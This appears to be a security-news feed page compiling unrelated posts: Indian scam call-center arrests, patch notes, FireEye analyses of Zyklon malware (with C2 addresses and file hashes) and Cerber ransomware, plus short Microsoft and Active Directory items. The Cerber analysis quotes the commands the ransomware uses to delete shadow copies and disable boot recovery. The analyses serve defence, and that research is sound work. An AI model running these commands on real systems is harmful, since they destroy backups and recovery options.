     The scammers had rented four floors of a building being operated by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

    Times of India photo 


    Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63.  (In a case just last month, another call center was said to have stolen from 300 victims, after using online job sites Shine.com and VintechJobs.com to recruit young money seekers by having them work conducting the scams. )

    In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

     Go to Tweet
    Noida police are advancing in their Cyber Crime skills!

    As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation thtat are becoming more critical to stopping fraud against Americans:

    We applaud the Center for Cyber Crime Investigation in Noida


    The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

    US Embassy to India thanks the Noida and Gurgaon Police for their help!
    Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region] had more details of this trend, including this graphic:


    That's at least 50 call centers shutdown just in these two regions, but with this weeks' 126 arrests being the culmination of an on-going investigation, receiving data from both the FBI and Microsoft.

    Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

    Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site,  vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

    Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

    During that same two day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It"
    Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people generating $28 Billion in India working for call centers, it isn't hard to disguise the shady callers among the legitimate businesses.

    The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

    Madan Ballal, Thane Crime Branch, outside Mumbai
    Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

    Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!



    Its the most wonderful time of the year – Patching

    does that say patching plaster or patch faster? 😉

    Remember back when Summer and Christmas break was a high time of concern.  The kids were out of college and ready to try out their skills.  Christmas was worse because so many people were out of the office, no one would notice.  Or if they did the response would be limited.   Now that’s what we call Tuesday afternoon.  Now days, the sysadmins have to deal not just with college code projects, but insider threat, money motivated attackers, and nation states.

    This week, Microsoft’s “out-of-band” security update reminded me of the old times.    An out-of-band update is simply a unscheduled one.  Its released out of the regular schedule because it is currently being exploited.  This lends a sense of urgency.    Some companies may have already bypassed December updates because of staffing, or scheduling.  Anyone in retail certainly has a change freeze in effect.  Now on top of that there is a special update for Internet Explorer.

    Information about the update for Internet Explorer is available here : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653 

    The post Its the most wonderful time of the year – Patching appeared first on Roger's Information Security Blog.

    Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign

    Introduction

    FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

    Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

    Infection Vector

    We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

    The following industries have been the primary targets in this campaign:

    • Telecommunications
    • Insurance
    • Financial Services


    Figure 1: Sample lure documents

    Attack Flow

    1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
    2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
    3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.

    A visual representation of the attack flow and execution chain can be seen in Figure 2.


    Figure 2: Zyklon attack flow

    Infection Techniques

    CVE-2017-8759

    This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

    The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).


    Figure 3: Embedded URL in OLE object

    CVE-2017-11882

    Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).


    Figure 4: Embedded URL in OLE object


    Figure 5: HTTP GET request to download the next level payload

    The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.


    Figure 6: PowerShell command to download the Pause.ps1 payload

    Dynamic Data Exchange (DDE)

    Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.


    Figure 7: DDE technique used to download the Pause.ps1 payload

    One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

    Figure 8 shows the network communication of the Pause.ps1 download.


    Figure 8: Network communication to download the Pause.ps1 payload

    Zyklon Delivery

    In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

    The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.


    Figure 9: Base64 decoded Pause.ps1

    The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.


    Figure 10: Network traffic to download final payload (words.exe)

    Once executed, the file performs the following activities:

    1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
    2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
    3. The unpacked code is Zyklon.


    Figure 11: XML configuration file to schedule the task

    The Zyklon malware first retrieves the external IP address of the infected machine using the following:

    • api.ipify[.]org
    • ip.anysrc[.]net
    • myexternalip[.]com
    • whatsmyip[.]com

    The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer.

    Command & Control Communication

    The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).


    Figure 12: Zyklon public RSA key

    After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.

    Command

    Action

    sign

    Requests system information

    settings

    Requests settings from C2 server

    logs

    Uploads harvested passwords

    wallet

    Uploads harvested cryptocurrency wallet data

    proxy

    Indicates SOCKS proxy port opened

    miner

    Cryptocurrency miner commands

    error

    Reports errors to C2 server

    ddos

    DDoS attack commands

    Table 1: Zyklon accepted commands

    The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


    Figure 13: Zyklon issuing “settings” command and subsequent server response


    Figure 14: Zyklon issuing “sign” command and subsequent server response


    Figure 15: Zyklon issuing “ddos” command and subsequent server response

    Plugin Manager

    Zyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:

    • /plugin/index.php?plugin=<Plugin_Name>

    The following plugins are found in the memory of the Zyklon malware:

    • /plugin/index.php?plugin=cuda
    • /plugin/index.php?plugin=minerd
    • /plugin/index.php?plugin=sgminer
    • /plugin/index.php?plugin=socks
    • /plugin/index.php?plugin=tor
    • /plugin/index.php?plugin=games
    • /plugin/index.php?plugin=software
    • /plugin/index.php?plugin=ftp
    • /plugin/index.php?plugin=email
    • /plugin/index.php?plugin=browser

    The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

    Additional Features

    The Zyklon malware offers the following additional capabilities (via plugins):

    Browser Password Recovery

    Zyklon HTTP can recover passwords from popular web browsers, including:

    • Google Chrome
    • Mozilla Firefox
    • Internet Explorer
    • Opera Browser
    • Chrome Canary/SXS
    • CoolNovo Browser
    • Apple Safari
    • Flock Browser
    • SeaMonkey Browser
    • SRWare Iron Browser
    • Comodo Dragon Browser
    FTP Password Recovery

    Zyklon currently supports FTP password recovery from the following FTP applications:

    • FileZilla
    • SmartFTP
    • FlashFXP
    • FTPCommander
    • Dreamweaver
    • WS_FTP
    Gaming Software Key Recovery

    Zyklon can recover PC Gaming software keys from the following games:

    • Battlefield
    • Call of Duty
    • FIFA
    • NFS
    • Age of Empires
    • Quake
    • The Sims
    • Half-Life
    • IGI
    • Star Wars
    Email Password Recovery

    Zyklon may also collect email passwords from following applications:

    • Microsoft Outlook Express
    • Microsoft Outlook 2002/XP/2003/2007/2010/2013
    • Mozilla Thunderbird
    • Windows Live Mail 2012
    • IncrediMail, Foxmail v6.x - v7.x
    • Windows Live Messenger
    • MSN Messenger
    • Google Talk
    • GMail Notifier
    • PaltalkScene IM
    • Pidgin (Formerly Gaim) Messenger
    • Miranda Messenger
    • Windows Credential Manager
    License Key Recovery

    The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

    Socks5 Proxy

    Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

    Hijack Clipboard Bitcoin Address

    Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

    Zyklon Pricing

    Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

    • Normal build: $75 (USD)
    • Tor-enabled build: $125 (USD)
    • Rebuild/Updates: $15 (USD)
    • Payment Method: Bitcoin (BTC)

    Conclusion

    Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

    At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

    Detection Name

    Product

    Action

    POWERSHELL DOWNLOADER D (METHODOLOGY)

    HX

    Detect

    SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

    HX

    Detect

    POWERSHELL DOWNLOADER (METHODOLOGY)

    HX

    Detect

    SUSPICIOUS EQNEDT USAGE (METHODOLOGY)

    HX

    Detect

    TOR (TUNNELER)

    HX

    Detect

    SUSPICIOUS SVCHOST.EXE (METHODOLOGY)

    HX

    Detect

    Malware.Binary.rtf

    EX/ETP/NX

    Block

    Malware.Binary

    EX/ETP/NX

    Block

    FE_Exploit_RTF_CVE_2017_8759

    EX/ETP/NX

    Block

    FE_Exploit_RTF_CVE201711882_1

    EX/ETP/NX

    Block

    Table 2: Current detection capabilities by FireEye products

    Indicators of Compromise

    The contained analysis is based on the representative sample lures shown in Table 3.

    MD5

    Name

    76011037410d031aa41e5d381909f9ce

    accounts.doc

    4bae7fb819761a7ac8326baf8d8eb6ab

    Courrier.doc

    eb5fa454ab42c8aec443ba8b8c97339b

    doc.doc

    886a4da306e019aa0ad3a03524b02a1c

    Pause.ps1

    04077ecbdc412d6d87fc21e4b3a4d088

    words.exe

    Table 3: Sample Zyklon lures

    Network Indicators
    • 154.16.93.182
    • 85.214.136.179
    • 178.254.21.218
    • 159.203.42.107
    • 217.12.223.216
    • 138.201.143.186
    • 216.244.85.211
    • 51.15.78.0
    • 213.251.226.175
    • 93.95.100.202
    • warnono.punkdns.top

    Uh Oh 365

    In an earlier post, I talked about how some vendors tend to push enterprises into a weaker security posture. In this post, I continue with information relating to Office 365. Microsoft’s cloud implementation of the Office suite is mind boggling in its complexity and sheer want of native connectivity. If you are using a proxy, […]

    Acknowledgement of Attacks Leveraging Microsoft Zero-Day

    FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

    FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

    FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

    Attack Scenario

    The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

    The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

    Acknowledgements

    FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

    Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

    Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

    On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

    Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

    FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

    Attack Process

    The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

    1. Target receives and opens a Word document.
    2. Macro in document is invoked to run PowerShell in hidden mode.
    3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
    4. On successful connection, the ransomware is written to the disk of the victim.
    5. PowerShell executes the ransomware.
    6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
    7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
    8. Files are encrypted and messages are presented to the user requesting payment.

    Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

    The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

    PowerShell Abuse

    When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

    Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

    It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

    In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

    Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

    Cerber in Action

    Initial payload behavior

    Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

    If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

    Shadow deletion

    As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

    Vssadmin.exe "delete shadows /all /quiet"

    WMIC.exe "shadowcopy delete"

    Bcdedit.exe "/set {default} recoveryenabled no"

    Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

    Coercion

    People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

    Figure 2. A message to the victim after encryption

    The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

     

     

    Figure 3. Ransom offered to victim, which is discounted for five days

    Multilingual Support

    As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

    Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

    Encryption

    Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

    Selective Targeting

    Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

    The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

    Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

    Anti VM Checks

    The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

    Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

    Persistence

    Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

    • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
    • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
    • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
    • Common persistence methods such as run and runonce key are also used.
    A Solid Defense

    Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

    Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

    Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

    FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

    Conclusion

    Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

    Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

    HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

    Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

    Click here for more information about Exploit Guard technology.

    REVIEW – “The Florentine Deception”, Carey Nachenberg

    BKFLODEC.RVW   20150609 “The Florentine Deception”, Carey Nachenberg, 2015, 978-1-5040-0924-9, U$13.49/C$18.91 %A   Carey Nachenberg http://florentinedeception.com %C   345 Hudson Street, New York, NY   10014 %D   2015 %G   978-1-5040-0924-9 150400924X %I   Open Road Distribution %O   U$13.49/C$18.91 www.openroadmedia.com %O  http://www.amazon.com/exec/obidos/ASIN/150400924X/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/150400924X/robsladesinte-21 %O   http://www.amazon.ca/exec/obidos/ASIN/150400924X/robsladesin03-20 %O   Audience n+ Tech 3 Writing 2 (see revfaq.htm for explanation) %P   321 p. %T   “The … Continue reading REVIEW – “The Florentine Deception”, Carey Nachenberg

    Google backpedals on its arbitrary vulnerability disclosure policy

    (LiveHacking.Com) – Google has been under fire in the last few weeks for arbitrarily disclosing zero-day vulnerabilities which give hackers the information they need to attack susceptible systems. When Google makes these disclosures it knows full well that it is risking the security and privacy of potentially millions of people. The positive side of these disclosures […]

    Microsoft to fix Windows vulnerability that Google publicly disclosed last week

    (LiveHacking.Com) – Microsoft will be issuing a series of security bulletins today (Patch Tuesday) to address security vulnerabilities in its products. One of these fixes will be for a vulnerability that Google intentionally disclosed to the public last week. Security experts at Google found a bug which could allow an attacker to gain elevated privileges on […]

    Microsoft fixes 24 security vulnerabilities in December’s Patch Tuesday

    (LiveHacking.Com) – As part of December’s Patch Tuesday, Microsoft has released seven security updates, three of which Microsoft has rated Critical, while the other four are rated Important in severity. These seven patches to address 24 security vulnerabilities in Microsoft Windows, Internet Explorer (IE), Office and Exchange. The first of the Critical patches is a cumulative […]

    Active Directory Unification and Attribute Cleanup

    I recently posted about Active Directory Unification. The main points were (1) that there is value in AD consolidation and (2) that there's a right way to do it to meet the intended goals.

    Sander Berkouwer posted earlier this month on Active Directory attribute integrity. He makes the point that with all the tools Microsoft provides to enable tighter management of identities and access (FIM, ADFS, ADRMS, DAC), Active Directory Cleanup is more important than ever. Berkouwer writes:
    "When these attributes are inconsistent, access to files, apps, partners and cloud functionality becomes inconsistent. If you think it won’t happen to you, think twice. During the first internal Microsoft deployment of Dynamic Access Control, attribute inconsistency was the first encountered problem."
    Absolutely.

    Most people that I speak with jump into the benefits that cleanup will have on the AD Unification process. The reality is that the real value of cleanup is enabling the right functionality and access controls after the unification process is complete. (Of course, as I wrote, it's never really complete - it's not a onetime event.)

    It's worth making the distinction.